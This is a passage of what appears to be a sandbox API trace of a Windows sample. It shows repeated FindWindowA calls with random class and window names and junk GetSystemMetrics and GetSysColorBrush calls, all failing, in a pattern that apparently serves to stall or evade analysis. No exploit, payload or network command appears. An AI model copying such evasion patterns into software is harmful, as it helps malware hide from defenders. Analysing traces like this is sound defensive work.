lpWindowName="nJBYau9pNGADgZBXNb7zwKkKQtGTObJFGbnJ4058OUejld62G2aF0gH331dpRzJUY0rHp2DJY") returned 0x0 [0308.360] GetLastError () returned 0x57 [0308.360] GetSystemMetrics (nIndex=95582882) returned 0 [0308.360] GetSysColorBrush (nIndex=39785939) returned 0x0 [0308.360] GetSystemMetrics (nIndex=29956592) returned 0 [0308.360] FindWindowA (lpClassName="eK8FiPwiGrlntAfAGa34PFrs8lBYIdfKbFmpafCDNKSmHg4yDLBeWpihN0tQfHserg3PIBWGN", lpWindowName="3mqIzIJ0W4tpNHUR860ewMrJ4FxiaQDKL894NutdD2H2JxI2qDuEgRiSQSlWY5SCk8T859i09") returned 0x0 [0308.360] FindWindowA (lpClassName="frPqHJZYaMBNK1iXZL4ANsS21uD9Mtp2VzxQIMRmH0r1Hy55zODtwAsoIZ8jdX2i5l40Sp2bK", lpWindowName="oSJDXYSCxiw6jM3PhtOg3asEoXv2rqhTqLgPF83SNTgwiXD3sIsKcS8sLizAOrDitBLcba7X5") returned 0x0 [0308.360] GetCurrentThreadId () returned 0xbe0 [0308.360] GetSystemMetrics (nIndex=75232827) returned 0 [0308.360] GetSysColorBrush (nIndex=72699384) returned 0x0 [0308.360] GetSystemMetrics (nIndex=55826537) returned 0 [0308.360] FindWindowA (lpClassName="FEDLmaugyBHFbwf84kTg47KCo8o7trurQyyRx0Ciup3vKIFFFeKznRscLXNP3YD6EIcDlGt9J", lpWindowName="bmMcA1KT2IREtuGahBX4rRNU2ccBjZ9kEqVDZHS1EaJt43KRBuPM0rNZxOTjaADvE5hxc9XUB") returned 0x0 [0308.360] FindWindowA (lpClassName="3wVG58W1dXVQ7T2jiSnzFCCwJkzVvCZbeeS5vffY8pji5rXgWipVLkwZQjx7RvgslSnHiiQGr", lpWindowName="EewwNhG4uEAcypCT1pUMsEaKrh3alz9FHZGaFIWhett4BtZ5AaKvmfGNJxxbarDKFWUCIgBn2") returned 0x0 [0308.360] GetLastError () returned 0x57 [0308.360] GetSystemMetrics (nIndex=74999357) returned 0 [0308.360] GetSysColorBrush (nIndex=54723548) returned 0x0 [0308.360] GetSystemMetrics (nIndex=73989956) returned 0 [0308.360] FindWindowA (lpClassName="wxZnBRdySNu1uojQxu0MOAV8oBgeLkSEWKonGoCLJywdUnEpjGZG8mtBqPyTmio5PT4GvVPqn", lpWindowName="ZcSvindNkGxHlY4wNqaN77FCgUkEDDzrKXqOfF7smiAEyT2kOtSTo66Lrcr5yjOQco3Vj0aPi") returned 0x0 [0308.361] FindWindowA (lpClassName="0EG3ERUqSlBTBs8OlHwtJVUdOCxPgrwVuBlKIcHIWv6asuC9lnyBdWmwBnScbIFVUAq20Qxw2", lpWindowName="1rMPs31BtvN2ai3f5y0zWbT3j3jcJ2Fbua51hlVSQI8vJuWzCsLvVIfLUzW0vCLxEZ2nOkmhg") returned 0x0 [0308.361] GetConsoleWindow () returned 0x0 [0308.361] GetSystemMetrics (nIndex=44869958) returned 0 [0308.361] GetSysColorBrush (nIndex=63828232) returned 0x0 [0308.361] GetSystemMetrics (nIndex=46965988) returned 0 [0308.361] FindWindowA (lpClassName="uC0ZsWhuaWQjBlmhoP6fb3v9QPCqionZadzbJGeg4xNHyuMe8MgBgXmyQCnKZcv4wr457Yqu5", lpWindowName="o91Fr8lHugbosFMc4qmj80di0rRdeuJB9ObSaxdANP0Ya0fOJONduMErxhqivOP0tYe9HoR27") returned 0x0 [0308.361] FindWindowA (lpClassName="WpbHFGm4Fgic7P9ZyGpUGU3woxS8nXNHaO88h22ADBjH3LRgs1dKNVcESA31z9CpVS0z60E28", lpWindowName="Y50XGY9nyB17twsevu29aHSfT4CWQQpXjsW9DoxWhYQK4Hpo1EvgIsU5c5jagz9xzofxz3MCR") returned 0x0 [0308.361] GetConsoleWindow () returned 0x0 [0308.361] GetSystemMetrics (nIndex=46838387) returned 0 [0308.361] GetSysColorBrush (nIndex=92773623) returned 0x0 [0308.361] GetSystemMetrics (nIndex=45583588) returned 0 [0308.361] FindWindowA (lpClassName="zE2bs7qtdvD94WYRVk0kRczPMm4e4rNPNAk9bSFKI9pt3LZ5YRfvQ9gnsqN6mNV3aP4ktSerT", lpWindowName="jpAzky1D66hCashmznna85uR8ymUZ3urrVVnN8vd8O8hkht0Cwl0wU33goE6Hlt2roonWiIDw") returned 0x0 [0308.361] FindWindowA (lpClassName="zho1G4DncXlyXRWzNtCpFtj9W9WpZj075BhEo6wCiskehrFomCxULrZBqpYjgss2Tr6J5bRRD", lpWindowName="UlCwzD0488aQayRgmAaIdtYHAUeZCt1EpYU91WcjwjzR1jxdVcEQtpCAwc1qHrQFkUZKwz7Fi") returned 0x0 [0308.361] GetCurrentProcessId () returned 0xf94 [0308.361] GetSystemMetrics (nIndex=48225584) returned 0 [0308.361] GetSysColorBrush (nIndex=49454545) returned 0x0 [0308.361] GetSystemMetrics (nIndex=28653285) returned 0 [0308.361] FindWindowA (lpClassName="3P9pCWdywwXIo9OrDuypUJ1dCyaIg6hsPFOtIqkyHdTGVUX74KD45m4KYmD5KzXxcJ303WXnA", lpWindowName="Fi7HIsKs7GrZAHA5MekyquGBu76J1kqJ3kNoDfICtZckIZM40tjg4AQebW1cLLTCnDBuU2O8Q") returned 0x0 [0308.362] FindWindowA (lpClassName="hzapzqpkV40D7kCpFtLhauCGW8YtzZAPqa8u6cUYZc0BhWRmm7x4RbGpd7fJM0FWyDKA0Fiqt", lpWindowName="jKgUskQgabTVnlEPtYAgwPwRz3yaBEK2LISUjNovhkGgCAjcKJBzPlDNOhw8tF1iMXOkyuvSK") returned 0x0 [0308.362] GetConsoleWindow () returned 0x0 [0308.362] GetSystemMetrics (nIndex=29564772) returned 0 [0308.362] GetSysColorBrush (nIndex=57472672) returned 0x0 [0308.362] GetSystemMetrics (nIndex=33669488) returned 0 [0308.362] FindWindowA (lpClassName="ybtua93nII59rKim7xanAZAFA6RBMnMGhVNrqGUKFmhtS2fzqtgqueyVzMdVhByXpOlmoeyZK", lpWindowName="OUImBT7HVVfcORx9b0Ky8FnP0vATc6zuBphInkYkjwJEWzKyxMQBaHkw2lWzLPpS5yFU2Hrm1") returned 0x0 [0308.362] FindWindowA (lpClassName="i7gvhaLtwrK48ORYeUjCAU8LMNhobVXB9IjcaGN5YivQvwRX5ZaA6L3ZzXkUmtUEd0wEoNfL0", lpWindowName="8traZtf673JBaLz8RKrYYflqRSUTPLHr1pdgnzZAHl7SZM8XD8W5a8ZwKjQJnvTOx2GaB8FYy") returned 0x0 [0308.362] GetConsoleWindow () returned 0x0 [0308.362] GetSystemMetrics (nIndex=36895343) returned 0 [0308.362] GetSysColorBrush (nIndex=84462422) returned 0x0 [0308.362] GetSystemMetrics (nIndex=35674445) returned 0 [0308.362] FindWindowA (lpClassName="3AtNq51XLTXIxNi2pPT8mDUUjnC3jpV4UCok05SD6s58hfpohlI7WVYfjwnuRkvudHcIbDK4r", lpWindowName="D3ocCsKPlIsvVaYFXrYDc3HsSXlTbh49koLaq7zG6ctef8TA3iAuVSxUhTXhYDSWCsbSFNOF7") returned 0x0 [0308.362] FindWindowA (lpClassName="SnlQy54Z3R5VZFhSMYbwdROW00ggvyP21OPXtq5aQOLvrgsyMXI3cLP38nDtYJ6IzKXuwzOiP", lpWindowName="a59W1paYLaqC9V3dRHvragmD4UZhnJDnd2NtE1cigJ0GSMdZyBb1T93lX9W5DrUyNzLMdvrxg") returned 0x0 [0308.362] GetConsoleWindow () returned 0x0 [0308.362] GetSystemMetrics (nIndex=79593528) returned 0 [0308.362] GetSysColorBrush (nIndex=38298992) returned 0x0 [0308.362] GetSystemMetrics (nIndex=25365973) returned 0 [0308.362] FindWindowA (lpClassName="j9KvFBUHHHetaPMDuRMIBFVtQpkgcQYZeFJKF50YaLZixHgjpOHzc46SEcOVh1XKT3oQ9YdZP", lpWindowName="XXuoKA09nMxYyMBSSKPheBGKjQZbsCknHuocV1oWgZadbjwCnJoUK8COBc32Qu4z5FLhGsGn8") returned 0x0 [0308.362] FindWindowA (lpClassName="5ZqeEVXCvEUUlT3sTbOxZkeLZhKGGhWeapCdVK7EoDu8UUDGuwR81NN9rqaocOP3WYV9Ki3wF", lpWindowName="derhzwyBYU7R4lyHVh67dl5DjxtvlSCjjgTPxV8cd40uZAVTvhxz6NUhwKdcfmCRkPwDOMj8k") returned 0x0 [0308.362] GetCurrentThreadId () returned 0xbe0 [0308.362] GetSystemMetrics (nIndex=79958459) returned 0 [0308.363] GetSysColorBrush (nIndex=57445733) returned 0x0 [0308.363] GetSystemMetrics (nIndex=58944568) returned 0 [0308.363] FindWindowA (lpClassName="dLydirwybxV6zwy6R6ts9dtHUaoYVUGA7KdNXy5KSQqfXNpAGmAMewKEmeWUWI7npasuAFTK6", lpWindowName="3KXS4RXWvLMfJVaWHfJ3naAH6GZ9oRqUdHo29NiVx6BXU8yhQlpKE3FZK76OjdeixQ2GeiN3Q") returned 0x0 [0308.363] FindWindowA (lpClassName="5hMccLdbDmfQXljZBCSdfcA0FJHIB5cocht8txX3J037MprpamEe6trwuVM9NpssUTIxUgpet", lpWindowName="VHsArm4VnqxZKnjbVOeNC2HzU8yvLlWPNKfYvxfFlfR9ptanGWINImNMtzQtdVN8gi6gFIfQl") returned 0x0 [0308.363] GetConsoleWindow () returned 0x0 [0308.363] GetSystemMetrics (nIndex=73938949) returned 0 [0308.363] GetSysColorBrush (nIndex=23756974) returned 0x0 [0308.363] GetSystemMetrics (nIndex=48946556) returned 0 [0308.363] FindWindowA (lpClassName="1zDtR8GCLdYgZ2STy3uYN3P6alzwuxhoqgzAOOJyN5vssfCL3IMPGEbYBHOIsXIBoyxuKZNI5", lpWindowName="5oEG3bVY3RoyAeV1kQ2eKw66OteEWkLRiCkH8gYuBVh4kq7ipnhP14n69DsTAjaYbcSaNGETd") returned 0x0 [0308.363] FindWindowA (lpClassName="3aV52CPt788BSuzJegUAyVE5t7hvR5QnhV6bWY5oxyIRM9EZRMJz7ZGtPIT29VwIbLAjgSDOv", lpWindowName="RwQbSjfhoDAYX4soDlBAenfgCmD5nFoiFcxbVHuCXv4lGWRvv72xsbFhljQEW89th3JtMN3jy") returned 0x0 [0308.363] GetCurrentProcessId () returned 0xf94 [0308.363] GetSystemMetrics (nIndex=38545567) returned 0 [0308.363] GetSysColorBrush (nIndex=88385653) returned 0x0 [0308.363] GetSystemMetrics (nIndex=66997994) returned 0 [0308.363] FindWindowA (lpClassName="USJZPdR3dI32aVj1j2MyL0PSnk2V9Ehyr5eByYJLmfavnl9PDrPvvr4A4mXb6RBE3GnzS4Nll", lpWindowName="TtZdNAAX1itxMM2qIRyNutbNXarHNhCwHLeQWDd8SmEZizyd0ojfJIdoHSi50NK4dXIuo6G7y") returned 0x0 [0308.363] FindWindowA (lpClassName="iaJOLGPCyJs8tCJ4ppre3iVHxj4DeRCd9ynRpxPDT7Q0PqGKl7tctrn9wbysHDMHZNoXBKk0R", lpWindowName="w94Lj7TuuqdJwc5QnPiXDL2shjBVOAclJME2e8hQs5c74A24lNk0dyeGfk69yrhWTZOb2n33f") returned 0x0 [0308.364] GetLastError () returned 0x57 [0308.364] GetSystemMetrics (nIndex=72437252) returned 0 [0308.364] GetSysColorBrush (nIndex=64687525) returned 0x0 [0308.364] GetSystemMetrics (nIndex=95536586) returned 0 [0308.364] FindWindowA (lpClassName="kzRuWZHHpszdA8AgCUpWJNNH99rHoqMiPGvcT3HQaDEIBZmX62p2PVpS9U6c0EoTIfuYE1Gz9", lpWindowName="Ry7w0KYo53f8g3JBHfu8Wo9wANAhjVEiN6CSJbD5iW7aw2M8GRrFzkPN77j3VolyEu55G7amE") returned 0x0 [0308.364] FindWindowA (lpClassName="bFnlp8nlNiuc1l2fs9ScfbuZLt4gAUsGUPuJ2PodJPa4PBsMQzgutWsiqk9vprFlc7a9bZQre", lpWindowName="LeCHw71QH1AqZhKqTmxITVvJjUyw8IoQZ5SEU5eJKeQg0mbhkZLfLn7siT865wyTN4YgTV3X6") returned 0x0 [0308.364] GetLastError () returned 0x57 [0308.364] GetSystemMetrics (nIndex=87698467) returned 0 [0308.364] GetSysColorBrush (nIndex=46867299) returned 0x0 [0308.364] GetSystemMetrics (nIndex=95794665) returned 0 [0308.364] FindWindowA (lpClassName="RofOQINge5pmyol0MB2oVMw8L3Nqd8sTmJG9VoxgBqTf8TbycFd1FvJHHSYLNNOKMqAQqHcNi", lpWindowName="cRU4EFXiDekJ3TdFcJUxBGesVbP8zkXSU9CePswDhQs8iDGo3rqPPhhmNrIHYdagMBstm5tpH") returned 0x0 [0308.364] FindWindowA (lpClassName="XLxPSKaDY8OyVSLCLx9qzWX7Y39FM1Zfsx5SvcnmoggorM1U51RmUM5tJt34cNSDREdiozwEK", lpWindowName="RUmj4YsuFJHCGRQOUls7H21KXyymfdbnvu5s1AtEEcxJIghMnitAT5n5IELkPvJiVfT9d0Kws") returned 0x0 [0308.364] GetConsoleWindow () returned 0x0 [0308.364] GetSystemMetrics (nIndex=22958652) returned 0 [0308.364] GetSysColorBrush (nIndex=39488697) returned 0x0 [0308.483] GetSystemMetrics (nIndex=25474997) returned 0 [0308.483] FindWindowA (lpClassName="REbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoa", lpWindowName="c8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2d") returned 0x0 [0308.483] FindWindowA (lpClassName="8S4kwIgTxSl1C00GOzOLMrbAyfKUUTsGCoRblsaqv6UpdvNIsNrmwUlN5u9t3tgj2tusZBauF", lpWindowName="MeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH") returned 0x0 [0308.483] GetCurrentThreadId () returned 0xbe0 [0308.483] GetSystemMetrics (nIndex=65979627) returned 0 [0308.483] GetSysColorBrush (nIndex=46853766) returned 0x0 [0308.483] GetSystemMetrics (nIndex=28537242) returned 0 [0308.483] FindWindowA (lpClassName="5Ayy61leDYT3CEW8K69rklPGtfUR2IZ2mB1S7NLt2nQfj3SL3XByImciQTqVaAUnJvUmHVQGs", lpWindowName="CmZFOv1QDIIXJNZI95hFQr77BIElyct4Aj6PKnZpzRiKYpZgnSOKlq8AzrHqDoGL4RHyqyX3g") returned 0x0 [0308.483] FindWindowA (lpClassName="hmWvn7MIr9oDUTOX7NYEkZgzUny1swObdYSEvWRBLzZ02h67YrlvBndn4cXPaoaKk5lQn33hf", lpWindowName="TmvHeuSEBMSPh2Q6dQAjy4KjsfSXF4YP8arF3SLLny30KKziHtRbOE2u8qvJP3B6Uiu1gJ03O") returned 0x0 [0308.483] GetLastError () returned 0x57 [0308.484] GetSystemMetrics (nIndex=67585863) returned 0 [0308.484] GetSysColorBrush (nIndex=46742236) returned 0x0 [0308.484] GetSystemMetrics (nIndex=89775247) returned 0 [0308.484] FindWindowA (lpClassName="UTjlTOSj3iH7JTRsbYH133TyWLIB4G3sV0ykPds7HX27KbNCCytJR8Cu6XFptEIP68v8ZdV60", lpWindowName="881nP7VxEE4FdgcL9fOPyc98bI89qTPFtysL1Q4GTOPwD7kkqPqQ5PNEEfuTlCH9WpIYaPHWf") returned 0x0 [0308.484] FindWindowA (lpClassName="r7J1hAkTkUFvMA0OSa91e9gqVNBeg10gAI4OMrxF2ltRPWacKwhzQyw8byxIFwOQfxFYy0quu", lpWindowName="GXAPZHAD2vQkWrpqiwdo3Hrdt6z3lSTpgTpRpRVcwo6HM8uA8D9eE4ZADtmvWvN20LBHSkD6q") returned 0x0 [0308.484] GetCurrentThreadId () returned 0xbe0 [0308.484] GetSystemMetrics (nIndex=66599883) returned 0 [0308.484] GetSysColorBrush (nIndex=67254977) returned 0x0 [0308.484] GetSystemMetrics (nIndex=93893558) returned 0 [0308.484] FindWindowA (lpClassName="jBQjgnZSCe8nPQHnppZqt456uNhaAAZ7eJqXZMwECM9T0ci76RojHkpC99IR3WsIMd3jKuWwP", lpWindowName="71MRVOgDko8fnPYlapdvxlUsBH29Cm3ORYkfrjRZDdw6LcpX33e1IOwWR2uaAtZVB5yi9ijSA") returned 0x0 [0308.484] FindWindowA (lpClassName="hTmfAUKYckdKB9Ppfr6SkbeR8PKPlKtGBlyLUlctAOGXldP7MVJKo22zHcL8AII08n8YXDzJF", lpWindowName="swERoC0nE0pAli9Mk6pyZdABIGpASsMZ6uUeHJj8Ut6sSUOT0ouihnKJGjkvaPWolzchUSmJq") returned 0x0 [0308.484] GetConsoleWindow () returned 0x0 [0308.484] GetSystemMetrics (nIndex=22478938) returned 0 [0308.484] GetSysColorBrush (nIndex=85384582) returned 0x0 [0308.484] GetSystemMetrics (nIndex=98265646) returned 0 [0308.484] FindWindowA (lpClassName="qabztw5K1eD28Kin4mMxkcNZnWrc6hIXQdczX4fr0RMtivVlvkI3S1WSxzzthFYqGEdkVpeKg", lpWindowName="G35SqTGtifPRHmoGrgKq6MbYsSXvy60MjweSbK31tz14EbA1KG3aMSFgDmnfMwafStMicLMPC") returned 0x0 [0308.484] FindWindowA (lpClassName="rAnGePtx5v3gYKbBkp7iE8TLmAZusXVJpKqtgPAOg1vriJN04X29XdBh8j0SCA0zKFZdSKQc5", lpWindowName="HaJ5P1fJXE0YMq1we9QL2rKEs8yKDAVn3QLJwWy0vNKb4LTfLMMLq080gXW8zW5v6qCQNwWaE") returned 0x0 [0308.485] GetCurrentProcessId () returned 0xf94 [0308.485] GetSystemMetrics (nIndex=76756667) returned 0 [0308.485] GetSysColorBrush (nIndex=47426252) returned 0x0 [0308.485] GetSystemMetrics (nIndex=25959442) returned 0 [0308.485] FindWindowA (lpClassName="GJhxWkhVYO3dJfBuCov1eETvOmdRXXNsyE4NHRkTZCBldIkbSUz2k4XdH9VxSffSaITvgEsji", lpWindowName="ykKPltKud5EUWDutAgMVsvmUM03YmjIqtYFpEFljgwsA1AnevjPJC0d543tUYLjC0XVLuq9Ca") returned 0x0 [0308.485] FindWindowA (lpClassName="tm9WgMaF0mJKATWd43OflAQsoC7WO95efK2h3B98kTDHqyzKXoJMFchjR1wTYI67ekrUydLRJ", lpWindowName="eOpxcfBn4tzYABythRDUSLUcbCkFeXVwVQZaOA2jb1NDCX3vP20n39X6hhgnz4Mf1it18OLKd") returned 0x0 [0308.485] GetCurrentProcessId () returned 0xf94 [0308.485] GetSystemMetrics (nIndex=44233454) returned 0 [0308.485] GetSysColorBrush (nIndex=33824336) returned 0x0 [0308.485] GetSystemMetrics (nIndex=64942596) returned 0 [0308.485] FindWindowA (lpClassName="NaQPFKnSJuhqhH2WlcvyL4MAeQXggMnn79XAVJRrz1uBdbraRvC4iU1b6GvS1TiZMqvUrwcY7", lpWindowName="XFyxfRWIz9RwJakyvPmMoLBCRyp0qZbXHjtanzWWpCmfLf8hgMcVOxm7E0c9GUa8m6xqqEZ1E") returned 0x0 [0308.485] FindWindowA (lpClassName="KWTSqZTqOpaZDAqyRvJykTwFn3VsamFkqU1BcDuG07mjjq873tLM70Rm3tBHYf2FpMSsvHgod", lpWindowName="RJCXTNIfkulpeHgd1xYctR9RF3YxVeBJKYQu7A0XTaehlb8tRbhXVz9Az1I6BDvjwRgw6eX3a") returned 0x0 [0308.485] GetLastError () returned 0x57 [0308.485] GetSystemMetrics (nIndex=96858862) returned 0 [0308.485] GetSysColorBrush (nIndex=66258923) returned 0x0 [0308.485] GetSystemMetrics (nIndex=49444426) returned 0 [0308.485] FindWindowA (lpClassName="2hXyhlbqHeXKIYpOhzGZdGTzkPJe5AhAzvRdS9AaopPbPCxcxwTJIK38Dwmj69IK6KVxSN2yF", lpWindowName="kY8vbduFDFDHnZw3L1gm3H3VlGaUSvXonVZYjXaRgVNcJNzs08I7m4baYXjmxEHysOozZhzLj") returned 0x0 [0308.485] FindWindowA (lpClassName="soZncwBZWwjV3ZoDNJq8VJQUEOLJ8jECD92Bxch5N00ZEPdi8nfR9Od6xmldTHodT9cZ93mGp", lpWindowName="0SCl9nTdejMgZRlccTGX8vuKrACuTi9DM5uXp9fEKZABTNEQDgsYmP69ydQsKCjSE1FtVosqE") returned 0x0 [0308.486] GetCurrentThreadId () returned 0xbe0 [0308.486] GetSystemMetrics (nIndex=57894344) returned 0 [0308.486] GetSysColorBrush (nIndex=59427366) returned 0x0 [0308.486] GetSystemMetrics (nIndex=33842699) returned 0 [0308.486] FindWindowA (lpClassName="NZSlQiFqDMeb4hgxaWXxsxi3ACh0XXdea2vQfNw0KkibxehT3v5G2OhZgKZmCVSQ9iCvUX1zC", lpWindowName="bgtUaYhSJcgVSEe4d3mbHE3wyiGOft3KmuvFnijwndit6Bb5rW1ssFwxwZrptnzsTGlZHvojW") returned 0x0 [0308.486] FindWindowA (lpClassName="S3mPW6Yl2M9LhIU3FqTyDvZdPUBXCBZ37CFjIy9znmJIgWyT7YIgH05yfrCMvfoH1VDKMYcf1", lpWindowName="N8tTeVZOXj6Sj9AMQKHQNTkRuv0HclWhC9NY7bxX4xfkPrCtcI90Gp8YjRnkbQUJSCLwxsz3z") returned 0x0 [0308.486] GetLastError () returned 0x57 [0308.486] GetSystemMetrics (nIndex=73468477) returned 0 [0308.486] GetSysColorBrush (nIndex=77652253) returned 0x0 [0308.486] GetSystemMetrics (nIndex=24424384) returned 0 [0308.486] FindWindowA (lpClassName="cdbhY3sPWbgPei2Rv4zNEaZDFtvsXZw234XoJil2JPwKFB81iFPt8VwYU9KSTc7TxJS5fgjZI", lpWindowName="EQxiTmCX4VVSgoKEVwwgXEGiQUNloYdC41w2UFYwoXBcjNemZauOR03U9ph3iHa1QFt7EeMp9") returned 0x0 [0308.486] FindWindowA (lpClassName="joTD3Roe9tUhzNCjFkhMJ9N1XXwN9r6Mjb526TR5xScJ1D4VjfrfwmOZGylOWSPdkICuBVbdX", lpWindowName="wWsOrkBPg1kIAEXDdao2rPY9Tmtf4IA5WaZ8awIzaTgyKnutVL7pdQQGnJwoIY54dGi6BxMDm") returned 0x0 [0308.486] GetConsoleWindow () returned 0x0 [0308.486] GetSystemMetrics (nIndex=65432559) returned 0 [0308.486] GetSysColorBrush (nIndex=89245538) returned 0x0 [0308.486] GetSystemMetrics (nIndex=48698922) returned 0 [0308.486] FindWindowA (lpClassName="0synipUKG3NoPJ53xAdfUxcPu6Q5IJB1U2zn9kaY4mOsN03T3z4D5HTaYd7tFsR0FvWCDz06y", lpWindowName="oyfsRaUwIQjMDtCJjXwy5PcXLicsSIwDbDSNVufCXt5NWzVipntaBawfSWL3TtuQP2t0APmhI") returned 0x0 [0308.486] FindWindowA (lpClassName="hzxfz0STGR3su0HxcrqCQMsVUX4jF7ZYNRVdoV5Y4fYPkSeGjxoXjAGxtI8m19vmCZI9YZU23", lpWindowName="o4opxOK84fta7oiKuQlPhKATD4GMsKNVH7Wfi1zg5YOvtVkrnzspgnKy5tETPiUphdxe2Scrb") returned 0x0 [0308.486] GetLastError () returned 0x57 [0308.486] GetSystemMetrics (nIndex=23453589) returned 0 [0308.486] GetSysColorBrush (nIndex=86733488) returned 0x0 [0308.487] GetSystemMetrics (nIndex=64233253) returned 0 [0308.487] FindWindowA (lpClassName="EWq1n8pIK3y8PebTkARVZR0DshPvYlRIDNgIaW8hqeueIFFc8Ah5QrfAPnUt1fm1jomYqLMlf", lpWindowName="1JyHaoYLHGNfzs4hiV6eYBQFaJ81eyTn3iSAM5r4R3MBFj8vRrqVxLAOy99exXT5bbbvHYEMy") returned 0x0 [0308.487] FindWindowA (lpClassName="N8p5O7p6UMlRxwQ0gpLRWaNEKvGkmY5kinZQ6XeFHZl1F6yKWN9wGTC2s6aatIYHgVdPedIoA", lpWindowName="qg101S7HPjM8oTPRr0e6FAzwzAENDGJVm9kFydOVVq0pUZ63bMA4rciLwRDfospupEkLJQ65r") returned 0x0 [0308.487] GetConsoleWindow () returned 0x0 [0308.487] GetSystemMetrics (nIndex=64489989) returned 0 [0308.487] GetSysColorBrush (nIndex=22853767) returned 0x0 [0308.487] GetSystemMetrics (nIndex=66247533) returned 0 [0308.487] FindWindowA (lpClassName="8ksHpDhFkSP3msI6XZMEwGusP3SjwgyDrgY9TcX1dY3RIctvUY16XSOiiZqTo9VxlSDaEFPgT", lpWindowName="hS46TFudBBKa5jiZPnCEDzHOTJcJwef0hg0ANLZMur7bed0KPb9PBkwzFeaKQbIbSBRl1scEx") returned 0x0 [0308.487] FindWindowA (lpClassName="0AiMpIzXoaswtGzU6wy9iUxz2Y2fKO8c7WYFWJhnUqUn6TDQvVpDlfyXC9nuPUABJkOmfySds", lpWindowName="s79ax7uR5QwN3gcifOpKg0RM3RXuN3aKtr60OvEXdaEYS8fsa4aLEli2Yl4L4vSa6xKTm1QJJ") returned 0x0 [0308.487] GetCurrentThreadId () returned 0xbe0 [0308.487] GetSystemMetrics (nIndex=35346428) returned 0 [0308.487] GetSysColorBrush (nIndex=35997672) returned 0x0 [0308.487] GetSystemMetrics (nIndex=74563333) returned 0 [0308.487] FindWindowA (lpClassName="9RxG5WLsE9f6ebsOTWbp8XIDgvWpgXGELxdEQOmiogcVQq7sZe2nsaw4Ee2fgWq21JU2Idl6E", lpWindowName="3S2GU59vVJVXO6aMx3QRb0xN2pI1y7pEgBpN6u9bEKwO76uAIrnHfcFYWeSgMJM08iYfRYDLB") returned 0x0 [0308.487] FindWindowA (lpClassName="CvxQXSd1tY9cmDzPdSIiwEtLHXVZsObjhSXpcfJ2aHgWeujLwzo8X96pNpLPnVhxSPRW0M25Q", lpWindowName="5F6wvy5JvKJa2djXrvvFDy6HLhk91Rggxp9WW1wYsVx5W0yG83ALuOHiI6yefMSqsKTlXhBhU") returned 0x0 [0308.487] GetCurrentThreadId () returned 0xbe0 [0308.487] GetSystemMetrics (nIndex=86369654) returned 0 [0308.487] GetSysColorBrush (nIndex=88756267) returned 0x0 [0308.487] GetSystemMetrics (nIndex=65555842) returned 0 [0308.487] FindWindowA (lpClassName="0QpZG9Uv54oGDDU5Qe8dZhX63rnPGGKZPb8jpgBfQtNRRxJ7Gc2dwPMY20H08Xwi0at2jVEr6", lpWindowName="diFwB4sAfmWR9Y4CP51DYzsDa6KVaDXAq6SHALXYpYf1bCi3eM6KWvIAASKJEO4Lb4bWozXys") returned 0x0 [0308.488] FindWindowA (lpClassName="4bVrNFVCYsA4K3Z6qeY0dLL7FNP3EehjTFOB7BoSptqXhGNFohRDz6vZVDReB6mxB0ZRaxbIR", lpWindowName="ihUPEYYFiiHS6HDN1kvhys8yv2BTixWgo5eeCVjy4wOCWaqQ12lrf58Tp9dlF4BG5xMLLGybR") returned 0x0 [0308.488] GetLastError () returned 0x57 [0308.488] GetSystemMetrics (nIndex=37583799) returned 0 [0308.488] GetSysColorBrush (nIndex=36276266) returned 0x0 [0308.488] GetSystemMetrics (nIndex=73429687) returned 0 [0308.488] FindWindowA (lpClassName="a7ZYwr4aTG2C7Qia3eeMydkfj2i13Pl32CTfFJ8zmglOu2GohPm2YQox9Kos6Ydc0ahMkQYpM", lpWindowName="qrMZEYnTQmK7lIhDLqGDyxsvVr0wSSm5SgMHz26YjkS8taguJgNakyOO9TJXQXpS68k8Rbkxg") returned 0x0 [0308.488] FindWindowA (lpClassName="4IzwW8GrZPpwYWcp6k8cactZ8rqYI0jHSGvY134iPlCeClSxjb7OdAsExNBNcNDG5OqjGagEu", lpWindowName="biZj9SKb47QxlfFjnWpMXD22rqy3wHKdP8es092dAcDHXjkOCjQJ0cyIXmWiNHDahXnZfIpnL") returned 0x0 [0308.488] GetCurrentThreadId () returned 0xbe0 [0308.488] GetSystemMetrics (nIndex=87897593) returned 0 [0308.488] GetSysColorBrush (nIndex=69399492) returned 0x0 [0308.488] GetSystemMetrics (nIndex=53885897) returned 0 [0308.488] FindWindowA (lpClassName="8bIc6hBsZXDwghPpNQni4Lq5Tx60luda1xIhy5fBefyAMnFn1xH2rTdqgIkaE2HxsdX1KlWXt", lpWindowName="uFoiMD1uTyJ7xgEfAATAO8kk8zTp0KVDibIRxxEqm7GYOpb2ewRo8LXY4dLywY6pHUqINoKRX") returned 0x0 [0308.488] FindWindowA (lpClassName="qyiCvQEAVXHGUEnG96tWCTpbJXpgSkSjBb8QRKGcEr9EjJT8GSvwdkPZXdphPRP5Ylz86bsQe", lpWindowName="qtyKwsZSva2AIvKLuvHJniJMmpQNGl6WXVW0idt8Zaj95SzkXT8ZpDQjl947fr7MoUF0Flcbt") returned 0x0 [0308.488] GetLastError () returned 0x57 [0308.488] GetSystemMetrics (nIndex=63556228) returned 0 [0308.488] GetSysColorBrush (nIndex=67726253) returned 0x0 [0308.488] GetSystemMetrics (nIndex=92658334) returned 0 [0308.488] FindWindowA (lpClassName="C32OM1JOkib5I5qY2lFhXWGXsC6Pt0GIsFTnTZSg06VDgG1FdC5dyGE2qW4HvjBRZVStdwwCU", lpWindowName="j711hzV7fdWFcRBREldWDBwkevQR4yfm8dE4WK2uFXHuibsiEsoM3wStIAQI66y2qtuF65y5q") returned 0x0 [0308.489] FindWindowA (lpClassName="O3NPVQNjnEo925b76we7p5ieeI8tYWmFGzuR3cRjrXkzmQa4DXFe9OH46yIUFl0XjDqDsE9G4", lpWindowName="zCgWm0oojRZf5LDFzwJsEkG1BZUdWp6sah2jzzjFWtxsrDzQOU2vYTHHoJCDeC83luem7raLU") returned 0x0 [0308.489] GetConsoleWindow () returned 0x0 [0308.489] GetSystemMetrics (nIndex=48659426) returned 0 [0308.489] GetSysColorBrush (nIndex=67346297) returned 0x0 [0308.489] GetSystemMetrics (nIndex=26332438) returned 0 [0308.489] FindWindowA 